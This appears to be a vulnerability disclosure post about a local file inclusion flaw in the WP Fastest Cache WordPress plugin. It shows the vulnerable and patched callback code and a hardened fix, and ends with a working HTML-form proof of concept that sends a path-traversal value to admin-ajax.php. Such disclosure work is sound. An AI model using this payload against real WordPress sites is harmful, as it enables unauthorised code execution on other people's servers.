Protecting You Against Wordfence’s Bad Practices: Local File Inclusion Vulnerability in WP Fastest Cache
Wordfence is putting WordPress websites at risk by disclosing vulnerabilities in plugins while leaving out the critical details needed to double check their work, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities and try to limit the damage Wordfence’s practice could cause.
Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Local File Inclusion vulnerability allows an attacker to execute code on the target web server or on a site visitor’s browser. This enables the attacker to steal or manipulate data, perform a denial of service attack or enable additional attack types such as Cross Site Scripting.”
The relevant change in the next version was to restrict the AJAX-accessible function wpfc_cdn_template_ajax_request_callback() in the file /wpFastestCache.php to Administrator level users.
Code in 0.8.5.7:
public function wpfc_cdn_template_ajax_request_callback(){
    ob_start();
    include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
    $content = ob_get_contents();
    ob_end_clean();

    $res = array("success" => false, "content" => "");

    if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
        $res["success"] = true;
        $res["content"] = $content;
    }

    echo json_encode($res);
    exit;
}
Code in 0.8.5.8:
public function wpfc_cdn_template_ajax_request_callback(){
    if(current_user_can('manage_options')){
        ob_start();
        include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
        $content = ob_get_contents();
        ob_end_clean();

        $res = array("success" => false, "content" => "");

        if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
            $res["success"] = true;
            $res["content"] = $content;
        }

        echo json_encode($res);
        exit;
    }else{
        wp_die("Must be admin");
    }
}
Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which substantially reduces the severity of the vulnerability.
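The fix in 0.8.5.8 only adds a capability check; the “id” value is still concatenated into the include path unvalidated. As an added example (not the plugin’s own code), here is how the callback could also validate the template name and confine the resolved path to the templates/cdn directory. WPFC_MAIN_PATH is assumed to be the plugin’s directory constant as in the original, and the nonce action name “wpfc_cdn_template” is an assumption.

```php
<?php
// Added example, not WP Fastest Cache's code: a hardened variant of the AJAX
// callback that validates the requested template name instead of relying
// only on current_user_can(). Response shape matches the original callback.

function wpfc_cdn_template_ajax_request_callback_hardened() {
    $fail = array( 'success' => false, 'content' => '' );

    // Capability check as in 0.8.5.8, plus a nonce so the request must come
    // from the plugin's own admin page (nonce action name is assumed).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json( $fail, 403 );
    }
    check_ajax_referer( 'wpfc_cdn_template', 'nonce' );

    $id = isset( $_POST['id'] ) ? (string) $_POST['id'] : '';

    // Only accept plain template names: letters, digits, underscore, hyphen.
    // This rejects "../", "/", null bytes and anything else path-like.
    if ( ! preg_match( '/\A[A-Za-z0-9_-]{1,64}\z/', $id ) ) {
        wp_send_json( $fail, 400 );
    }

    // Defence in depth: resolve both paths and require the file to sit inside
    // templates/cdn even after symlink resolution.
    $base = realpath( WPFC_MAIN_PATH . 'templates/cdn' );
    $file = realpath( $base . '/' . $id . '.php' );
    if ( false === $base || false === $file
        || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json( $fail, 404 );
    }

    ob_start();
    include $file;
    $content = ob_get_clean();

    wp_send_json( array( 'success' => true, 'content' => $content ) );
}
```

wp_send_json() and check_ajax_referer() both terminate the request on their own, so no explicit exit is needed after them.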
Proof of Concept
The following proof of concept will cause a file named test.php located in the root directory of the WordPress installation to be included.
Make sure you are logged in to WordPress, ideally as a subscriber, since that role has the fewest capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
<input type="hidden" name="id" value="../../../../../test" />
<input type="submit" value="Submit" />
</form>
</body>
</html>